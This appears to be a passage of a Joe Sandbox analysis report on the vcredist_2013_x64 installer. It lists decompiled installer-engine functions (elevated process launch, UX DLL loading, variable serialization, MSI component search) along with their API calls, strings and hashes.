Instruction Fuzzy Hash: 86318471A2021BABDB225FA9DD89AEEBBADEF147D0F044265FD14EB210D770D9008790

Uniqueness

Uniqueness Score: -1.00%

Function 01282ADE Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E01282ADE(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				void* __esi;
				long _t27;
				char* _t33;
				void* _t42;
				intOrPtr* _t47;

				_t27 = GetCurrentProcessId();
				_t47 = _a8;
				_push(_t27);
				_push( *((intOrPtr*)(_t47 + 4)));
				_push( *_t47);
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				_v8 = 0;
				_t42 = E012B177A( &_v12, L"-q -%ls %ls %ls %u", L"burn.elevated");
				if(_t42 >= 0) {
					E012B6371(_t47,  &_v16,  &_v20);
					if(_v16 < 5) {
						L4:
						_t33 = L"open";
						L5:
						_t42 = E012B6285(_a4, _v12, _t33, 0, 0, _a16,  &_v8);
						if(_t42 >= 0) {
							 *((intOrPtr*)(_t47 + 8)) = GetProcessId(_v8);
							 *((intOrPtr*)(_t47 + 0xc)) = _v8;
							_v8 = 0;
						} else {
							E012AFA86(_t42, "Failed to launch elevated child process: %ls", _a4);
						}
						L8:
						if(_v8 != 0) {
							CloseHandle(_v8);
							_v8 = 0;
						}
						if(_v12 != 0) {
							E012B01E8(_v12);
						}
						return _t42;
					}
					_t33 = L"runas";
					if(_a12 != 0) {
						goto L5;
					}
					goto L4;
				}
				_push("Failed to allocate parameters for elevated process.");
				_push(_t42);
				E012AFA86();
				goto L8;
			}

0x01282ae7
0x01282aed
0x01282af0
0x01282af1
0x01282af6
0x01282b06
0x01282b09
0x01282b0c
0x01282b0f
0x01282b17
0x01282b1e
0x01282b37
0x01282b40
0x01282b4c
0x01282b4c
0x01282b51
0x01282b66
0x01282b6a
0x01282b88
0x01282b8e
0x01282b91
0x01282b6c
0x01282b75
0x01282b7a
0x01282b94
0x01282b97
0x01282b9c
0x01282ba2
0x01282ba2
0x01282ba8
0x01282bad
0x01282bad
0x01282bb8
0x01282bb8
0x01282b42
0x01282b4a
0x00000000
0x00000000
0x00000000
0x01282b4a
0x01282b20
0x01282b25
0x01282b26
0x00000000

APIs

GetCurrentProcessId.KERNEL32(00000000,0128130D,80070642,?,?,0128130D), ref: 01282AE7
CloseHandle.KERNEL32(000000FF), ref: 01282B9C

Strings

-q -%ls %ls %ls %u, xrefs: 01282B00
burn.elevated, xrefs: 01282AFB
runas, xrefs: 01282B42
Failed to allocate parameters for elevated process., xrefs: 01282B20
open, xrefs: 01282B4C, 01282B5A
Failed to launch elevated child process: %ls, xrefs: 01282B6F

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseCurrentHandleProcess
String ID: -q -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to launch elevated child process: %ls$burn.elevated$open$runas
API String ID: 2391145178-1352204306
Opcode ID: ef811929e5e913ce0344e9e70a06f0d38fa7cc405c6cfd4029ab1191069647da
Instruction ID: 567e444f73b058b2a42d58d698b0b97d70a24da765f814f22dcd9a8d520015e8
Opcode Fuzzy Hash: ef811929e5e913ce0344e9e70a06f0d38fa7cc405c6cfd4029ab1191069647da
Instruction Fuzzy Hash: 48218C71D2220AFFCF12EF99CC85DEEBBB8EF58350B10846AE515A2250E7B15A50DB50

Uniqueness

Uniqueness Score: -1.00%

Function 0128BA46 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 62
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0128BA46(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HINSTANCE__* _t8;
				_Unknown_base(*)()* _t9;
				signed int _t13;
				signed int _t16;
				intOrPtr _t21;
				signed int _t23;

				_t21 = _a4;
				_t8 = LoadLibraryW( *( *((intOrPtr*)(_t21 + 4)) + 0x50));
				 *(_t21 + 0xc) = _t8;
				if(_t8 != 0) {
					_t9 = GetProcAddress(_t8, "BootstrapperApplicationCreate");
					if(_t9 != 0) {
						_t23 =  *_t9(_a8, _a12, _t21 + 0x10);
						if(_t23 < 0) {
							_push("Failed to create UX.");
							goto L14;
						}
					} else {
						_t13 = GetLastError();
						if(_t13 > 0) {
							_t13 = _t13 & 0x0000ffff | 0x80070000;
						}
						_t23 = _t13;
						if(_t23 >= 0) {
							_t23 = 0x80004005;
						}
						E012B294E(_t13, "userexperience.cpp", 0x65, _t23);
						_push("Failed to get BootstrapperApplicationCreate entry-point");
						goto L14;
					}
				} else {
					_t16 = GetLastError();
					if(_t16 > 0) {
						_t16 = _t16 & 0x0000ffff | 0x80070000;
					}
					_t23 = _t16;
					if(_t23 >= 0) {
						_t23 = 0x80004005;
					}
					E012B294E(_t16, "userexperience.cpp", 0x61, _t23);
					_push("Failed to load UX DLL.");
					L14:
					_push(_t23);
					E012AFA86();
				}
				return _t23;
			}

0x0128ba4a
0x0128ba53
0x0128ba59
0x0128ba5e
0x0128ba99
0x0128baa1
0x0128bae2
0x0128bae6
0x0128bae8
0x00000000
0x0128bae8
0x0128baa3
0x0128baa3
0x0128baab
0x0128bab2
0x0128bab2
0x0128bab7
0x0128babb
0x0128babd
0x0128babd
0x0128baca
0x0128bacf
0x00000000
0x0128bacf
0x0128ba60
0x0128ba60
0x0128ba68
0x0128ba6f
0x0128ba6f
0x0128ba74
0x0128ba78
0x0128ba7a
0x0128ba7a
0x0128ba87
0x0128ba8c
0x0128baed
0x0128baed
0x0128baee
0x0128baf4
0x0128baf9

APIs

LoadLibraryW.KERNEL32(?,?,?,012817CA,?,00000000,?,?,00000000,00000000,?,?,?,01281E12,?), ref: 0128BA53
GetLastError.KERNEL32(?,012817CA,?,00000000,?,?,00000000,00000000,?,?,?,01281E12,?), ref: 0128BA60
GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 0128BA99
GetLastError.KERNEL32(?,012817CA,?,00000000,?,?,00000000,00000000,?,?,?,01281E12,?), ref: 0128BAA3

Strings

Failed to create UX., xrefs: 0128BAE8
BootstrapperApplicationCreate, xrefs: 0128BA93
Failed to load UX DLL., xrefs: 0128BA8C
userexperience.cpp, xrefs: 0128BA82, 0128BAC5
Failed to get BootstrapperApplicationCreate entry-point, xrefs: 0128BACF

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
API String ID: 1866314245-2276003667
Opcode ID: e984d9c9ce35c5b01c34a5b00b24c3f4f6d1f109c71aa8f7c6b6dcc2701899f9
Instruction ID: 5a3069c3e52ac01660058d1e17842eedfc84c71e6fdc1a03ad02526f652a5e64
Opcode Fuzzy Hash: e984d9c9ce35c5b01c34a5b00b24c3f4f6d1f109c71aa8f7c6b6dcc2701899f9
Instruction Fuzzy Hash: E411CA36AB2723E7D73169599C19F5A7A84AF10BA2F05022CFB54E7290E555D80047D4

Uniqueness

Uniqueness Score: -1.00%

Function 0128A7D2 Relevance: 15.1, APIs: 2, Strings: 8, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E0128A7D2(void* __ecx, void* __edx, void* __eflags, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				char _v8;
				char _v12;
				char _v16;
				char _v24;
				char _v32;
				void* __ebx;
				void* __edi;
				intOrPtr _t53;
				intOrPtr _t57;
				intOrPtr _t60;
				void* _t65;
				void* _t68;
				intOrPtr _t72;
				void* _t73;

				_t73 = __eflags;
				_t68 = __edx;
				_t65 = __ecx;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				EnterCriticalSection(_a4);
				_t64 = _a16;
				_t72 = E012B25B7(_t65, _t73, _a8, _a12, _a16,  &_v12);
				if(_t72 >= 0) {
					_a16 = _a16 & 0x00000000;
					__eflags = _v12;
					if(__eflags > 0) {
						while(1) {
							_t70 = _a12;
							_t72 = E012B25B7(_t65, __eflags, _a8, _a12, _t64,  &_v16);
							__eflags = _t72;
							if(_t72 < 0) {
								break;
							}
							__eflags = _v16;
							if(__eflags == 0) {
								L14:
								_a16 = _a16 + 1;
								__eflags = _a16 - _v12;
								if(__eflags < 0) {
									continue;
								} else {
								}
							} else {
								_t72 = E012B2674(_t65, _t68, __eflags, _a8, _t70, _t64,  &_v8);
								__eflags = _t72;
								if(__eflags < 0) {
									_push("Failed to read variable name.");
									goto L24;
								} else {
									_t72 = E012B25B7(_t65, __eflags, _a8, _t70, _t64,  &_v24);
									__eflags = _t72;
									if(_t72 < 0) {
										_push("Failed to read variable value type.");
										goto L24;
									} else {
										_t53 = _v24;
										__eflags = _t53;
										if(_t53 == 0) {
											L12:
											_t71 =  &_v32;
											_t72 = E01289DA3(_t64, _t65,  &_v32, _a4, _v8, 2, 0);
											__eflags = _t72;
											if(_t72 < 0) {
												_push("Failed to set variable.");
												goto L24;
											} else {
												E012A0E72(_t71);
												goto L14;
											}
										} else {
											_t57 = _t53 - 1;
											__eflags = _t57;
											if(__eflags == 0) {
												L11:
												_t72 = E012B2612(_t65, __eflags, _a8, _t70, _t64,  &_v32);
												__eflags = _t72;
												if(_t72 < 0) {
													_push("Failed to read variable value as number.");
													goto L24;
												} else {
													goto L12;
												}
											} else {
												_t60 = _t57 - 1;
												__eflags = _t60;
												if(__eflags == 0) {
													_t72 = E012B2674(_t65, _t68, __eflags, _a8, _t70, _t64,  &_v32);
													__eflags = _t72;
													if(_t72 >= 0) {
														goto L12;
													} else {
														_push("Failed to read variable value as string.");
														goto L24;
													}
												} else {
													__eflags = _t60 - 1;
													if(__eflags != 0) {
														_t72 = 0x80070057;
														_push("Unsupported variable type.");
														goto L24;
													} else {
														goto L11;
													}
												}
											}
										}
									}
								}
							}
							goto L25;
						}
						_push("Failed to read variable included flag.");
						goto L24;
					}
				} else {
					_push("Failed to read variable count.");
					L24:
					_push(_t72);
					E012AFA86();
				}
				L25:
				LeaveCriticalSection(_a4);
				if(_v8 != 0) {
					E012B01E8(_v8);
				}
				E012A0E72( &_v32);
				return _t72;
			}

0x0128a7d2
0x0128a7d2
0x0128a7d2
0x0128a7e0
0x0128a7e3
0x0128a7e6
0x0128a7ec
0x0128a7ed
0x0128a7ee
0x0128a7ef
0x0128a7f0
0x0128a7f6
0x0128a809
0x0128a80d
0x0128a819
0x0128a81d
0x0128a821
0x0128a827
0x0128a827
0x0128a838
0x0128a83a
0x0128a83c
0x00000000
0x00000000
0x0128a842
0x0128a846
0x0128a8bd
0x0128a8bd
0x0128a8c3
0x0128a8c6
0x00000000
0x00000000
0x0128a8cc
0x0128a848
0x0128a856
0x0128a858
0x0128a85a
0x0128a8fc
0x00000000
0x0128a860
0x0128a86e
0x0128a870
0x0128a872
0x0128a903
0x00000000
0x0128a878
0x0128a87b
0x0128a87b
0x0128a87e
0x0128a89d
0x0128a8a4
0x0128a8af
0x0128a8b1
0x0128a8b3
0x0128a911
0x00000000
0x0128a8b5
0x0128a8b8
0x00000000
0x0128a8b8
0x0128a880
0x0128a880
0x0128a880
0x0128a881
0x0128a889
0x0128a897
0x0128a899
0x0128a89b
0x0128a90a
0x00000000
0x00000000
0x00000000
0x00000000
0x0128a883
0x0128a883
0x0128a883
0x0128a884
0x0128a8dc
0x0128a8de
0x0128a8e0
0x00000000
0x0128a8e2
0x0128a8e2
0x00000000
0x0128a8e2
0x0128a886
0x0128a886
0x0128a887
0x0128a8e9
0x0128a8ee
0x00000000
0x00000000
0x00000000
0x00000000
0x0128a887
0x0128a884
0x0128a881
0x0128a87e
0x0128a872
0x0128a85a
0x00000000
0x0128a846
0x0128a8f5
0x00000000
0x0128a8f5
0x0128a80f
0x0128a80f
0x0128a916
0x0128a916
0x0128a917
0x0128a91d
0x0128a91e
0x0128a921
0x0128a92b
0x0128a930
0x0128a930
0x0128a939
0x0128a944

APIs

EnterCriticalSection.KERNEL32(?,000000F9,00000001,00000000,000000F9,00000031,000000F9,00000105,00000000,?,?,?), ref: 0128A7F0
LeaveCriticalSection.KERNEL32(00000000), ref: 0128A921

Strings

Failed to read variable value as number., xrefs: 0128A90A
Failed to set variable., xrefs: 0128A911
Failed to read variable value as string., xrefs: 0128A8E2
Unsupported variable type., xrefs: 0128A8EE
Failed to read variable name., xrefs: 0128A8FC
Failed to read variable value type., xrefs: 0128A903
Failed to read variable included flag., xrefs: 0128A8F5
Failed to read variable count., xrefs: 0128A80F

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to read variable count.$Failed to read variable included flag.$Failed to read variable name.$Failed to read variable value as number.$Failed to read variable value as string.$Failed to read variable value type.$Failed to set variable.$Unsupported variable type.
API String ID: 3168844106-1201737872
Opcode ID: 197678f83c94c13398a5c3c4cca4293a4fa457db1ba36273542110c2bd661ec0
Instruction ID: 02c7a8db3a271efced09181e2bb61a870dd6e04473c6407c92aa6883e9d998f5
Opcode Fuzzy Hash: 197678f83c94c13398a5c3c4cca4293a4fa457db1ba36273542110c2bd661ec0
Instruction Fuzzy Hash: 09416276D3621AFBDB22AE54DC45EFE7B78EB10790F018116FA00A7190DB749E01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01288D27 Relevance: 15.1, APIs: 2, Strings: 8, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E01288D27(void* __eflags, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t37;
				intOrPtr _t45;
				void* _t46;
				void* _t48;
				signed int _t54;
				void* _t65;
				struct _CRITICAL_SECTION* _t68;
				intOrPtr* _t71;

				_push(_t57);
				_t68 = _a4;
				EnterCriticalSection(_t68);
				_t65 = E012B2845(_a12, _a16,  *((intOrPtr*)(_t68 + 0x1c)));
				_t37 = 0;
				if(_t65 >= 0) {
					_v12 = 0;
					if( *((intOrPtr*)(_t68 + 0x1c)) > 0) {
						_v8 = 0;
						while(1) {
							_t58 = _a4;
							_t71 =  *((intOrPtr*)(_a4 + 0x20)) + _v8;
							if(_a8 == _t37) {
								_t54 = 0 |  *((intOrPtr*)(_t71 + 0x20)) == _t37;
							} else {
								_t12 = _t71 + 0x1c; // 0x503c7500
								_t54 =  *_t12;
							}
							_t65 = E012B2845(_a12, _a16, _t54);
							if(_t65 < 0) {
								break;
							}
							if(_t54 == 0) {
								L16:
								_v12 = _v12 + 1;
								_v8 = _v8 + 0x30;
								if(_v12 <  *((intOrPtr*)(_a4 + 0x1c))) {
									_t37 = 0;
									continue;
								}
							} else {
								_t56 = _a16;
								_t65 = E012B28A4(_t58, _a12, _a16,  *_t71);
								if(_t65 < 0) {
									_push("Failed to write variable name.");
									goto L25;
								} else {
									_t20 = _t71 + 0x10; // 0x5d395274
									_t65 = E012B2845(_a12, _t56,  *_t20);
									if(_t65 < 0) {
										_push("Failed to write variable value type.");
										goto L25;
									} else {
										_t22 = _t71 + 0x10; // 0x5d395274
										_t45 =  *_t22;
										if(_t45 == 0) {
											goto L16;
										} else {
											_t46 = _t45 - 1;
											if(_t46 == 0) {
												L15:
												_t65 = E012B2871(_a12, _t56,  *((intOrPtr*)(_t71 + 8)),  *((intOrPtr*)(_t71 + 0xc)));
												if(_t65 < 0) {
													_push("Failed to write variable value as number.");
													goto L25;
												} else {
													goto L16;
												}
											} else {
												_t48 = _t46 - 1;
												if(_t48 == 0) {
													_t65 = E012B28A4(_t58, _a12, _t56,  *((intOrPtr*)(_t71 + 8)));
													if(_t65 >= 0) {
														goto L16;
													} else {
														_push("Failed to write variable value as string.");
														goto L25;
													}
												} else {
													if(_t48 != 1) {
														_t65 = 0x80070057;
														_push("Unsupported variable type.");
														L25:
														_push(_t65);
														E012AFA86();
													} else {
														goto L15;
													}
												}
											}
										}
									}
								}
							}
							goto L27;
						}
						_push("Failed to write included flag.");
						goto L25;
					}
				} else {
					_push("Failed to write variable count.");
					_push(_t65);
					E012AFA86();
				}
				L27:
				LeaveCriticalSection(_a4);
				return _t65;
			}

0x01288d2b
0x01288d2d
0x01288d32
0x01288d46
0x01288d48
0x01288d4c
0x01288d60
0x01288d66
0x01288d6c
0x01288d70
0x01288d70
0x01288d76
0x01288d7c
0x01288d88
0x01288d7e
0x01288d7e
0x01288d7e
0x01288d7e
0x01288d97
0x01288d9b
0x00000000
0x00000000
0x01288da3
0x01288df1
0x01288df1
0x01288dfa
0x01288e01
0x01288e03
0x00000000
0x01288e03
0x01288da5
0x01288da7
0x01288db3
0x01288db7
0x01288e36
0x00000000
0x01288db9
0x01288db9
0x01288dc5
0x01288dc9
0x01288e3d
0x00000000
0x01288dcb
0x01288dcb
0x01288dce
0x01288dd1
0x00000000
0x01288dd3
0x01288dd3
0x01288dd4
0x01288ddc
0x01288deb
0x01288def
0x01288e44
0x00000000
0x00000000
0x00000000
0x00000000
0x01288dd6
0x01288dd6
0x01288dd7
0x01288e16
0x01288e1a
0x00000000
0x01288e1c
0x01288e1c
0x00000000
0x01288e1c
0x01288dd9
0x01288dda
0x01288e23
0x01288e28
0x01288e49
0x01288e49
0x01288e4a
0x00000000
0x00000000
0x00000000
0x01288dda
0x01288dd7
0x01288dd4
0x01288dd1
0x01288dc9
0x01288db7
0x00000000
0x01288e51
0x01288e2f
0x00000000
0x01288e2f
0x01288d4e
0x01288d4e
0x01288d53
0x01288d54
0x01288d5a
0x01288e52
0x01288e55
0x01288e60

APIs

EnterCriticalSection.KERNEL32(?,00000000,00000000,?,?,?,0128FBE7,00000001,00000000,?,012A387B,?,012A387B,?,?,012A387B), ref: 01288D32
LeaveCriticalSection.KERNEL32(?,?,012A387B,?,?,?,?,0128FBE7,00000001,00000000,?,012A387B,?,012A387B,?,?), ref: 01288E55

Strings

0, xrefs: 01288DFA
Failed to write variable name., xrefs: 01288E36
Failed to write variable value as string., xrefs: 01288E1C
Failed to write included flag., xrefs: 01288E2F
Failed to write variable count., xrefs: 01288D4E
Unsupported variable type., xrefs: 01288E28
Failed to write variable value type., xrefs: 01288E3D
Failed to write variable value as number., xrefs: 01288E44

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: 0$Failed to write included flag.$Failed to write variable count.$Failed to write variable name.$Failed to write variable value as number.$Failed to write variable value as string.$Failed to write variable value type.$Unsupported variable type.
API String ID: 3168844106-1107513445
Opcode ID: ac4f97c60c171cc871e05c8464128cebc9a21ccd043888155c4b3be5ebadb749
Instruction ID: a66807c63626b6947a7cb3ad339287c87d4c21072000771c9236527a8f8fc09e
Opcode Fuzzy Hash: ac4f97c60c171cc871e05c8464128cebc9a21ccd043888155c4b3be5ebadb749
Instruction Fuzzy Hash: E731913653270AEFCF12AF64CC808AE7BB5EF58390B544429FA55A72E0DB71EC119B50

Uniqueness

Uniqueness Score: -1.00%

Function 01287D2E Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E01287D2E(intOrPtr* __esi, intOrPtr _a4) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t37;
				intOrPtr _t38;
				void* _t39;
				void* _t46;
				void* _t52;
				void* _t55;
				intOrPtr _t61;
				void* _t63;
				intOrPtr* _t64;
				void* _t65;

				_t64 = __esi;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				_v8 = 0;
				if(E01288C14(_a4,  *((intOrPtr*)(__esi + 0x18)),  &_v16, 0) >= 0) {
					_t34 =  *((intOrPtr*)(__esi + 0x14));
					if( *((intOrPtr*)(__esi + 0x14)) == 0) {
						L5:
						_push( &_v8);
						_push( &_v12);
						_push(_v16);
						if(_v20 == 0) {
							_t37 = E012B3F38(_t50);
						} else {
							_push(_v20);
							_t37 = E012B3E71(_t50);
						}
						_t63 = _t37;
						_t38 = _v12;
						_t61 = 4;
						if(_t38 != 0xfffffffc) {
							if(_t38 == 0xffffffff || _t38 == 0xfffffff9) {
								_t38 = 2;
								goto L17;
							} else {
								if(_t38 == 2 || _t38 == 3 || _t38 == _t61) {
									goto L18;
								} else {
									_t63 = 0x80070057;
									E012AFA86(0x80070057, "Failed to get component path: %d", _t38);
									_t65 = _t65 + 0xc;
									goto L35;
								}
							}
						} else {
							_t38 = _t61;
							L17:
							_v12 = _t38;
							L18:
							_t52 =  *((intOrPtr*)(_t64 + 0x10)) - 1;
							if(_t52 == 0) {
								if(_t38 == 2 || _t38 == 3 || _t38 == _t61) {
									L30:
									_t39 = E0128A734(_a4,  *((intOrPtr*)(_t64 + 4)), _v8, 0);
									L31:
									_t63 = _t39;
									goto L32;
								} else {
									L32:
									if(_t63 >= 0) {
										L36:
										if(_v16 != 0) {
											E012B01E8(_v16);
										}
										if(_v20 != 0) {
											E012B01E8(_v20);
										}
										if(_v8 != 0) {
											E012B01E8(_v8);
										}
										return _t63;
									}
									_push("Failed to set variable.");
									L34:
									_push(_t63);
									E012AFA86();
									L35:
									_push(_t63);
									E012AF6A2(2, "MsiComponentSearch failed: ID \'%ls\', HRESULT 0x%x",  *_t64);
									goto L36;
								}
							}
							_t55 = _t52 - 1;
							if(_t55 == 0) {
								asm("cdq");
								_t39 = E0128A6F5(_a4,  *((intOrPtr*)(_t64 + 4)), _t38, _t61, 0);
								goto L31;
							}
							if(_t55 != 1 || _t38 != 2 && _t38 != 3 && _t38 != _t61) {
								goto L32;
							} else {
								_t46 = E012A8296(_v8, 0x5c);
								if(_t46 != 0) {
									 *((short*)(_t46 + 2)) = 0;
								}
								goto L30;
							}
						}
					}
					_t50 =  &_v20;
					_t63 = E01288C14(_a4, _t34,  &_v20, 0);
					if(_t63 >= 0) {
						goto L5;
					}
					_push("Failed to format product code string.");
					goto L34;
				}
				_push("Failed to format component id string.");
				goto L34;
			}

0x01287d2e
0x01287d40
0x01287d46
0x01287d49
0x01287d4c
0x01287d58
0x01287d64
0x01287d69
0x01287d89
0x01287d8c
0x01287d90
0x01287d91
0x01287d97
0x01287da3
0x01287d99
0x01287d99
0x01287d9c
0x01287d9c
0x01287da8
0x01287daa
0x01287daf
0x01287db3
0x01287dbc
0x01287deb
0x00000000
0x01287dc3
0x01287dc6
0x00000000
0x01287dd1
0x01287ddd
0x01287ddf
0x01287de4
0x00000000
0x01287de4
0x01287dc6
0x01287db5
0x01287db5
0x01287dec
0x01287dec
0x01287def
0x01287df2
0x01287df3
0x01287e35
0x01287e40
0x01287e4a
0x01287e4f
0x01287e4f
0x00000000
0x01287e51
0x01287e51
0x01287e53
0x01287e74
0x01287e77
0x01287e7c
0x01287e7c
0x01287e84
0x01287e89
0x01287e89
0x01287e91
0x01287e96
0x01287e96
0x01287ea0
0x01287ea0
0x01287e55
0x01287e5a
0x01287e5a
0x01287e5b
0x01287e62
0x01287e62
0x01287e6c
0x00000000
0x01287e71
0x01287e35
0x01287df5
0x01287df6
0x01287e22
0x01287e2b
0x00000000
0x01287e2b
0x01287df9
0x00000000
0x01287e09
0x01287e0e
0x01287e17
0x01287e1b
0x01287e1b
0x00000000
0x01287e17
0x01287df9
0x01287db3
0x01287d6c
0x01287d79
0x01287d7d
0x00000000
0x00000000
0x01287d7f
0x00000000
0x01287d7f
0x01287d5a
0x00000000

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 01287D4F
_MREFOpen@16.MSPDB140-MSVCRT ref: 01287D74

Strings

Failed to format component id string., xrefs: 01287D5A
Failed to set variable., xrefs: 01287E55
MsiComponentSearch failed: ID '%ls', HRESULT 0x%x, xrefs: 01287E65
Failed to get component path: %d, xrefs: 01287DD7
Failed to format product code string., xrefs: 01287D7F

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Open@16
String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
API String ID: 3613110473-1671347822
Opcode ID: f5606b9154409ccdbf6e10f89fd00356bc33f55fed52cd679ce5458a1c7553f2
Instruction ID: b37c9465f6efc5c20c1dd4017a1e1e3a1c7e93c8a2aa5dcfd1d1dfd6fd4b2210
Opcode Fuzzy Hash: f5606b9154409ccdbf6e10f89fd00356bc33f55fed52cd679ce5458a1c7553f2
Instruction Fuzzy Hash: F441C57793220BAFDF26BFA8CCC18BE7A76EB54314B38496AF315921D1D7708E409611

Uniqueness

Uniqueness Score: -1.00%

Function 01281762 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 123
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E01281762(void* __eax, intOrPtr* _a4) {
				int _v8;
				void* _v12;
				struct tagMSG _v40;
				void* __esi;
				int _t34;
				intOrPtr* _t37;
				int _t38;
				int _t40;
				intOrPtr* _t43;
				void* _t44;
				intOrPtr* _t46;
				signed int _t59;
				void* _t77;
				void* _t83;

				_t59 = 7;
				_t77 = __eax;
				memset( &_v40, 0, _t59 << 2);
				_v12 = 0;
				PeekMessageW( &_v40, 0, 0x400, 0x400, 0);
				_t34 = E012931A9(_t83, _t77, GetCurrentThreadId(),  &_v12);
				_v8 = _t34;
				if(_t34 >= 0) {
					_t34 = E0128BA46(_t77 + 0xb8, _v12, _t77 + 0x1c);
					_v8 = _t34;
					__eflags = _t34;
					if(_t34 >= 0) {
						_t37 =  *((intOrPtr*)(_t77 + 0xc8));
						_t38 =  *((intOrPtr*)( *_t37 + 0xc))(_t37);
						_v8 = _t38;
						__eflags = _t38;
						if(_t38 >= 0) {
							while(1) {
								_t40 = GetMessageW( &_v40, 0, 0, 0);
								__eflags = _t40;
								if(_t40 == 0) {
									break;
								}
								__eflags = _t40 - 0xffffffff;
								if(_t40 == 0xffffffff) {
									_v8 = 0x8000ffff;
									E012B294E(_t40, "engine.cpp", 0x246, 0x8000ffff);
									_push("Unexpected return value from message pump.");
									_push(0x8000ffff);
									goto L7;
								} else {
									E012812D7( &_v40, _t77);
									continue;
								}
								goto L13;
							}
							 *((intOrPtr*)(_t77 + 0xf4)) = _v40.wParam;
						} else {
							_push("Failed to start bootstrapper application.");
							_push(_t38);
							L7:
							E012AFA86();
						}
						L13:
						_t43 =  *((intOrPtr*)(_t77 + 0xc8));
						_t44 =  *((intOrPtr*)( *_t43 + 0x10))(_t43);
						__eflags = _t44 - 0x66;
						if(_t44 != 0x66) {
							__eflags = _t44 - 0x68;
							if(_t44 == 0x68) {
								_push(0x20000006);
								_push(2);
								E01281566();
								 *_a4 = 1;
								goto L18;
							}
						} else {
